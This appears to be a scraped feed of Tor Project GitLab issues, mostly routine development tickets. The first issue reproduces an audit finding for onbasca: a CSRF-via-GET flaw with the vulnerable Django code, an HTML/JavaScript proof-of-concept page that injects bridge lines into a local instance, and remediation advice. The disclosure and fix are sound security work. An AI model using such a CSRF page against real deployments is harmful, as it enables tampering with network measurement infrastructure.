The Tor Project issueshttps://gitlab.torproject.org/groups/tpo/-/issues2023-10-19T15:40:40Zhttps://gitlab.torproject.org/tpo/network-health/onbasca/-/issues/162TOR-008 Pen-torproject#8: onbasca - CSRF via GET allows adding bridges on pro...2023-10-19T15:40:40ZjugaTOR-008 Pen-torproject#8: onbasca - CSRF via GET allows adding bridges on production configurationThe [commit](https://gitlab.torproject.org/tpo/network-health/onbasca/-/merge_requests/71/diffs?commit_id=ba028464b794a68764cafec6a5f6e93c2aa50044#b0c9b1e7215ec336ecacb37431093a273ed77fb2) did not fix the vulnerability because the bridge...The [commit](https://gitlab.torproject.org/tpo/network-health/onbasca/-/merge_requests/71/diffs?commit_id=ba028464b794a68764cafec6a5f6e93c2aa50044#b0c9b1e7215ec336ecacb37431093a273ed77fb2) did not fix the vulnerability because the bridge line is still passed via HTTP GET, which prevents Django Middleware's CSRF protection from taking effect.
The Onion Bandwidth Scanner (onbasca), suffers from a Cross-Site Request Forgery (CSRF) vulnerability via HTTP
GET. As a result, pre-authenticated attackers can inject bridges into the database.
Threat level: High
Technical description:
The create_bridges view parses the bridges passed via HTTP GET to bridge_lines and stores them in a database via the _create_bridge function.
In tpo/network-health/onbasca/onbrisca/views.py/views.py:
```
@csrf_exempt
def create_bridges(request):
[...]
if not request.method == "GET":
return JsonResponse(response_data, status=403) # Forbidden
if request.content_type == "application/json":
data = json.loads(request.body)
else:
data = dict(request.GET)
bridge_lines = data.get("bridge_lines", None)
[...]
for bridge_line in bridge_lines:
bridge_result = _create_bridge(bridge_line, mu, muf, bridge_ratio)
[...]
return response
```
The bridgescan command measures the bandwidth of the bridges stored in the database. For this Django management command, a bridgescan daemon is shipped as a systemd service file during the installation of
onbasca.
In tpo/network-health/onbasca/onbrisca/management/commands/bridgescan.py:
```
class Command(OnbascaCommand):
def handle(self, *args, **options):
scanner = BridgeScanner.load()
scanner.init(port=config.EXTERNAL_CONTROL_PORT)
scanner.run()
```
The set_bridgelines method obtains all bridges from the database via the bridges parameter, including the
attacker's previously added bridges. In the next step, the newly injected bridges are used to connect to the Tor network.
In tpo/network-health/onbasca/onbrisca/bridge_torcontrol.py:
```
class BridgeTorControl(TorControl):
def set_bridgelines(self, bridges):
bridgelines = Bridge.objects.bridgelines_from_bridges(bridges)
# Obtain first the bridges already set to do not set duplicated bridges
tor_bridgelines = self.controller.get_conf("Bridge", multiple=True)
new_bridgelines = set(bridgelines).difference(set(tor_bridgelines))
if new_bridgelines:
self.controller.set_conf("Bridge", new_bridgelines)
self.controller.set_conf("UseBridges", "1")
```
Proof of Concept
```
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Nothing to see here :)</title>
</head>
<body>
<script>
function poc(){
try {
const response = fetch("http://127.0.0.1:8000/bridge-state/?
bridge_lines=obfs4+0.0.0.0%3A00000+AAA+cert%3D0+iat-mode%3D0");
if (!response.ok) {
alert("Network response was not OK");
}
} catch (error) {
alert("error")
console.error("There has been a problem with your fetch operation:", error);
}
}
</script>
<input type="button" value="RUN POC!" onclick="poc()"/>
</body>
</html>
```
Impact:
Attackers can lure Directory Authorities victims to their site and perform a successful CSRF attack as soon the victim's browser runs in the same network as onbasca. This is the case when the victim uses the Django web interface. As a result, pre-authenticated attackers can inject attacker-controlled IPs into the database. When the bridgescan command is invoked, which runs regularly, the onbasca application will connect to the attacker-controlled bridge. By doing this, attackers may be able to daemonize the hosted instance of onbasca or carry out further attacks.
Since onbasca is similar to the bandwidth scanner implementation of sbws, it's highly likely that onbasca is also affected by finding TOR-028.
Recommendation:
- Accept the bridge line via request.POST only, so the HTTP request must be a POST request.
- Then remove the @csrf_exempt decorator.
- Finally, enable the default Django CSRF middleware.
_Editing to add more information from the auditor's report._jugajuga2023-09-21https://gitlab.torproject.org/tpo/applications/tor-browser-build/-/issues/40930Upate zlib to 1.3 after 13.0a32023-10-03T15:38:17ZrichardUpate zlib to 1.3 after 13.0a3zlib had an update but we should let it bake in Nightly before yolo'ing into Alpha
https://github.com/madler/zlib/releaseszlib had an update but we should let it bake in Nightly before yolo'ing into Alpha
https://github.com/madler/zlib/releasesrichardrichardhttps://gitlab.torproject.org/tpo/applications/tor-browser-build/-/issues/40929Update go to 1.21 series after 13.0a32023-10-03T13:27:53ZrichardUpdate go to 1.21 series after 13.0a3New major go version let's make sure it builds and works in Nightly before yolo'ing in an Alpha build.
https://golang.org/dlNew major go version let's make sure it builds and works in Nightly before yolo'ing in an Alpha build.
https://golang.org/dlrichardrichardhttps://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42035Update tools/torbrowser/ scripts to support macOS dev environment2023-10-03T13:27:54ZrichardUpdate tools/torbrowser/ scripts to support macOS dev environmentWe have some lovely scripts in `tools/torbrowser` to support building firefox and deploying over a local dev install of Tor Browser. basically They download the latest alpha and deploy local dev builds of firefox over it with proper tor ...We have some lovely scripts in `tools/torbrowser` to support building firefox and deploying over a local dev install of Tor Browser. basically They download the latest alpha and deploy local dev builds of firefox over it with proper tor and PT integration.
The only problem is they assume an x86_64 Linux dev environment!
We should add support for a macOS dev environment.clairehurstclairehursthttps://gitlab.torproject.org/tpo/anti-censorship/lox/-/issues/29Add metrics for open Invite distribution2023-10-31T21:21:02ZonyinyangAdd metrics for open Invite distributionFuther to #28 we should add metrics to measure how quickly we get to k number of users as well as how quickly we get to the maximum buckets distributed (#28) each day so we can better tweak our distribution process.Futher to #28 we should add metrics to measure how quickly we get to k number of users as well as how quickly we get to the maximum buckets distributed (#28) each day so we can better tweak our distribution process.onyinyangonyinyanghttps://gitlab.torproject.org/tpo/anti-censorship/lox/-/issues/28Set daily max bucket distribution and adjust other settings for production2024-02-15T16:52:09ZonyinyangSet daily max bucket distribution and adjust other settings for productionWe likely need to decide on an upper bound of buckets that can be distributed each day so that we don't run out of open invitation buckets. We currently have buckets being distributed to k users before a new bucket is used but if buckets...We likely need to decide on an upper bound of buckets that can be distributed each day so that we don't run out of open invitation buckets. We currently have buckets being distributed to k users before a new bucket is used but if buckets are continuously requested, we will eventually run out of buckets each day. These variables should be part of a configuration file for Lox.Lox Ready for Open Testing Callonyinyangonyinyanghttps://gitlab.torproject.org/tpo/core/arti/-/issues/1014start_conversation doesn't actually send the message to the right hop2023-08-21T13:14:56ZNick Mathewsonstart_conversation doesn't actually send the message to the right hop~~see the code for start_conversation: the hop_num goes into the handler, not the Conversation or the message.~~
Ah, never mind. This is taken from the handler.expected_hop().~~see the code for start_conversation: the hop_num goes into the handler, not the Conversation or the message.~~
Ah, never mind. This is taken from the handler.expected_hop().Nick MathewsonNick Mathewsonhttps://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42029Defense-in-depth: disable non-proxied UDP WebRTC2023-10-03T15:38:22Zma1Defense-in-depth: disable non-proxied UDP WebRTCDefense-in-depth for base-browser & tor-browser (WebRTC currently disabled), experiment for mullvad-browser where WebRTC is enabled (see https://gitlab.torproject.org/tpo/applications/mullvad-browser/-/issues/151#note_2929915).Defense-in-depth for base-browser & tor-browser (WebRTC currently disabled), experiment for mullvad-browser where WebRTC is enabled (see https://gitlab.torproject.org/tpo/applications/mullvad-browser/-/issues/151#note_2929915).ma1ma1https://gitlab.torproject.org/tpo/tpa/team/-/issues/41302Collect prometheus data from Centralized Probe Log(probetelemetry-01@)2023-08-30T20:36:51ZshelikhooCollect prometheus data from Centralized Probe Log(probetelemetry-01@)In order to create an alert system for log collector, it would be necessary to collect the prometheus data exported from logcollector(https://gitlab.torproject.org/tpo/anti-censorship/connectivity-measurement/logcollector/-/merge_request...In order to create an alert system for log collector, it would be necessary to collect the prometheus data exported from logcollector(https://gitlab.torproject.org/tpo/anti-censorship/connectivity-measurement/logcollector/-/merge_requests/5).
The prometheus listener is present on `http://127.0.0.1:8080/metrics` , and listened on `127.0.0.1` interface only.
Currently there is only one entry, however, we intend to add more in the future.anarcatanarcathttps://gitlab.torproject.org/tpo/web/donate-static/-/issues/122Add note - No PayPal via Tor2023-09-06T18:18:46ZmattlavAdd note - No PayPal via TorWe recently showed that donating to Tor, via PayPal, using the Tor network doesn't work (#81 , multiple user messages); According to #120 we will disable the donate.tp.o onion site altogether. In the meantime, we can save visitors a real...We recently showed that donating to Tor, via PayPal, using the Tor network doesn't work (#81 , multiple user messages); According to #120 we will disable the donate.tp.o onion site altogether. In the meantime, we can save visitors a real headache by warning them with some text on the page, by the "How do you want to DONATE?" prompt. Here's my first draft, subject to revision ( @smith ):
`PayPal cannot process donations made via the Tor Network. We apologize for the inconvenience.`https://gitlab.torproject.org/tpo/network-health/metrics/descriptorParser/-/issues/49DescriptorParser is failing to create data consistently in VM and the DB2023-09-19T15:28:22ZHiroDescriptorParser is failing to create data consistently in VM and the DBThe parser is crashing and/or nooping somewhere.
- [ ] Find why this is happening and apply patch
- [ ] Reprocess the missed daysThe parser is crashing and/or nooping somewhere.
- [ ] Find why this is happening and apply patch
- [ ] Reprocess the missed daysHiroHirohttps://gitlab.torproject.org/tpo/applications/mullvad-browser/-/issues/228Remove popup asking for preferred language on websites2023-10-03T13:29:57ZruihildtRemove popup asking for preferred language on websitesHere's the popup, which displays after switching away from the default language.
_Pardon my french (screenshot)._
![image](/uploads/cc5edd9c39097937103ffd6599354861/image.png)
We suspect it's confusing and most users will click it away ...Here's the popup, which displays after switching away from the default language.
_Pardon my french (screenshot)._
![image](/uploads/cc5edd9c39097937103ffd6599354861/image.png)
We suspect it's confusing and most users will click it away anyway, and maybe will take the wrong choice. Research in https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/40414 seems to agree about it.
Moreover, websites aren't reliably using that hint to serve localized content to users and are as likely to base it on IP location.
For these reasons We would like to remove that popup and keep the sane default.
**It is a blocker to have multi-language support in Mullvad Browser.**richardrichardhttps://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42015Review Mozilla 1830890: Keep a history window of WebRTC stats for about:webrtc2023-10-05T12:44:53ZrichardReview Mozilla 1830890: Keep a history window of WebRTC stats for about:webrtcLink: https://bugzilla.mozilla.org/show_bug.cgi?id=1830790
We should make sure there's no disk leak here, and if there is gate it behind private browsing mode and uplift.Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1830790
We should make sure there's no disk leak here, and if there is gate it behind private browsing mode and uplift.richardrichardhttps://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42013Review Mozilla 1834374: Do not call EmptyClipboard() in nsBaseClipboard destr...2023-12-04T08:05:07ZrichardReview Mozilla 1834374: Do not call EmptyClipboard() in nsBaseClipboard destructorLink: https://bugzilla.mozilla.org/show_bug.cgi?id=1834374
So this patch is correct in terms of the undefined behaviour aspects: by the time the nsBaseClipboard destructor is called on the object, its implementing class's destructor wou...Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1834374
So this patch is correct in terms of the undefined behaviour aspects: by the time the nsBaseClipboard destructor is called on the object, its implementing class's destructor would have already been called, so calling virtual methods is undefined/broken (since they may touch data that has already been destructed).
Now, we *may* still want to call EmptyClipboard() on destruction (but correctly).
To whomever writes this potential patch, please read up on destruction order/virtual destructors so we don't re-introduce undefined behaviour.
@donuts do you think we would want this behaviour gated on private browsing only mode (clearing clipboard on exit).
@ma1 can we clear clipboard contents iff the contents were placed there by the browser?
@ruihildt if we do want this in Tor Browser, do you think we would *also* want this in Mullvad Browser? The fix is new in FF115 so iirc the current Mullvad Browser is clearing the clipboard on exit.ma1ma1https://gitlab.torproject.org/tpo/team/-/issues/205Help with VPN CE to DRL2023-08-17T13:06:57ZGabagaba@torproject.orgHelp with VPN CE to DRLGabagaba@torproject.orgGabagaba@torproject.orghttps://gitlab.torproject.org/tpo/tpa/team/-/issues/41298Add RAM to henryi2023-08-15T15:01:14ZTom Rittertom@ritter.vgAdd RAM to henryiIt seems like even with no parallel workers I'm still getting some OOM errors. (I can't see dmesg, but the script seems to be being killed.)
Could we increase the RAM (or swap? never did fully understand the interaction...) by a bit a...It seems like even with no parallel workers I'm still getting some OOM errors. (I can't see dmesg, but the script seems to be being killed.)
Could we increase the RAM (or swap? never did fully understand the interaction...) by a bit and see if that resolves things?anarcatanarcathttps://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42010Review Mozilla 1810641: Enable overscroll on Windows on all channels2023-10-05T12:57:01ZrichardReview Mozilla 1810641: Enable overscroll on Windows on all channelsLink: https://bugzilla.mozilla.org/show_bug.cgi?id=1810641
@thorin is overscroll something we need to consider re ~Fingerprinting or is it a case where so-long as everyone has it it's fine. Skimming the ticket suggests the overscroll on...Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1810641
@thorin is overscroll something we need to consider re ~Fingerprinting or is it a case where so-long as everyone has it it's fine. Skimming the ticket suggests the overscroll only happens when scrolling via touch.
EDIT: fwiw enabling the provided pref on Linux did not enable any new functionality on my laptop, but libinput is kind of a shitshow w/ regards to touchpad support/functionality so it may just be seeing it a mouse+scroll wheel.
/cc @donutshttps://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42006Review Mozilla 1817726: Allow sharing current tab URL from Android's Recents ...2023-10-03T13:28:05ZrichardReview Mozilla 1817726: Allow sharing current tab URL from Android's Recents (App Overview) screen.Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1817726
Hopefully this is properly handling/is disabled private browsing mode but we must check.Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1817726
Hopefully this is properly handling/is disabled private browsing mode but we must check.Dan BallardDan Ballardhttps://gitlab.torproject.org/tpo/core/torspec/-/issues/217Consider a proposal about advertising protocols of intro points, rend points,...2023-10-26T14:19:20ZNick MathewsonConsider a proposal about advertising protocols of intro points, rend points, and onion servicesWhile writing onion service code in Arti, we're finding places where we'd like the onion client to know the supported protocols of the intro point, and onion service; and where we'd like the onion service to know the supported protocols ...While writing onion service code in Arti, we're finding places where we'd like the onion client to know the supported protocols of the intro point, and onion service; and where we'd like the onion service to know the supported protocols of the rendezvous point.
Currently, the algorithm for Intro points and Rend points is something like,
* Look up the listed relay in your consensus, and use its protocols if you find them.
* Otherwise, use the minimal supported protocols ("required-relay-protocols") listed in the consensus.
For onion services, you can't assume support for _any_ protocol. We _could_ assume that the onion service has the protocols listed in "required-client-protocols", but those are updated as infrequently as possible. When we _do_ need the onion service to advertise support for something new, we have to add a new field in the service descriptor.
I suggest that instead we could write a proposal to do some or all of the following:
1. Encode intro points' protocol lists in the service descriptor
2. Encode rendezvous points' protocol lists in the INTRODUCE2 body
3. Create a new "protocols" line in the onion service descriptor, containing a subset of the onion service's supported protocols.Nick MathewsonNick Mathewsonhttps://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/41999TB13.0a2 android: center text on connect button2023-10-03T13:28:10ZThorinTB13.0a2 android: center text on connect buttonupdated from 12.5 series
- connect text on connect button is not centered
moved
- #42023 since I upgraded a version, I got a meatball bull dot for what's new -> firefox release page
- #42024 when I visited the first website, I got a Fir...updated from 12.5 series
- connect text on connect button is not centered
moved
- #42023 since I upgraded a version, I got a meatball bull dot for what's new -> firefox release page
- #42024 when I visited the first website, I got a Firefox popup/panel telling me all about ETPDan BallardDan Ballard